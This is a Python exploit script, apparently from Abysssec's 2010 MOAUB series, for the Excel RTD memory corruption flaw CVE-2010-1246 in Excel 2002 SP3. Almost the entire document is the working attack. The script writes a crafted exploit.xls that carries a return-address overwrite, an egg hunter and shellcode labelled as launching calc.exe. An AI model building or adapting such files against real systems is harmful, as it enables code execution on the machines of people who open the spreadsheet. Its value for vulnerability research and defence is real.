Excel RTD Memory Corruption
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-13  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
http://www.exploit-db.com/sploits/moaub-10-exploit.zip
'''

'''
  Title             :  Excel RTD Memory Corruption
  Version           :  Excel 2002 sp3
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.microsoft.com
  Impact            :  Critical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-1246
  MOAUB Number      :  MOAUB_10_BA
'''

 

import sys

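# Fixed layout of the generated file (all values taken from the original script).
_SRC_FILE = 'src.xls'
_OUT_FILE = 'exploit.xls'
_EGG_HUNTER_SIZE = 266   # egg hunter is NOP-padded to exactly this many bytes
_SHELLCODE_SIZE = 800    # shellcode is NOP-padded to exactly this many bytes
# Slices of src.xls that are carried over unchanged; the two gaps between them
# (4509:5013 = 504 bytes and 15000:15800 = 800 bytes) receive the payload.
_KEEP_1 = slice(None, 4509)
_KEEP_2 = slice(5013, 15000)
_KEEP_3 = slice(15800, None)


def _pad_nops(data, size, what):
    """Return *data* right-padded with 0x90 (NOP) bytes to exactly *size*.

    Raises ValueError if *data* is already longer than *size*; *what* names
    the buffer in the error message (e.g. "Shellcode").
    """
    if len(data) > size:
        raise ValueError("[*] Error : %s length is long" % what)
    return data + b'\x90' * (size - len(data))


def main():
    """Generate exploit.xls from src.xls (Excel 2002 SP3, CVE-2010-1246).

    Reads src.xls, keeps three slices of it and writes them to exploit.xls
    with the two gaps filled by the fixed-size regions built below.  Both
    regions are exactly as long as the slices they replace (504 and 800
    bytes), so the output file has the same size as the input.

    Prints an error and returns if either buffer exceeds its fixed size;
    prints an error and exits with status -1 on an I/O failure (missing
    src.xls, unwritable exploit.xls).
    """
    eip = b"\xAd\x57\x00\x30"    # pop pop ret
    jmp = b"\xF7\xC2\x03\x30"    # call esp

    # Egg Hunter
    egg_hunter = b"".join([
        b"\x90\x90\x90",
        b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63",
        b"\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7",
    ])

    # shellcode calc.exe
    shellcode = (
        b'\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
    )

    try:
        # Read-only is all that is needed here ('rb+' in the original would
        # also fail on a read-only source file).
        with open(_SRC_FILE, 'rb') as src:
            data = src.read()

        egg_hunter = _pad_nops(egg_hunter, _EGG_HUNTER_SIZE, "Egg hunter")
        shellcode = _pad_nops(shellcode, _SHELLCODE_SIZE, "Shellcode")

        # 3 + 4 + 266 + 4 + 4 + 6 + 1 + 216 = 504 bytes: exactly the size of
        # the first gap (4509:5013) it is written into.
        region = b"".join([
            b"\x41\x41\x41",                # padding
            jmp,
            egg_hunter,
            b"\xeb\x06\x41\x41",
            eip,
            b"\x81\xc4\x24\x16\x00\x00",    # add esp,2016
            b"\xc3",                        # ret
            b"\x41\x41\x41\x41" * 54,       # padding
        ])

        # 'with' closes both files on every path, including the error exits
        # below (the original leaked the handles when it returned early).
        with open(_OUT_FILE, 'wb') as out:
            out.write(data[_KEEP_1])
            out.write(region)
            out.write(data[_KEEP_2])
            out.write(shellcode)     # second gap (15000:15800), 800 bytes
            out.write(data[_KEEP_3])
        print('[-] Excel file generated')
    except ValueError as err:
        # Length check failed; message already names the offending buffer.
        print(err)
        return
    except IOError:
        print('[*] Error : An IO error has occurred')
        print('[-] Exiting ...')
        sys.exit(-1)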
               
if __name__ == "__main__":
    # Script entry point: only generate the file when run directly, not on import.
    main()


 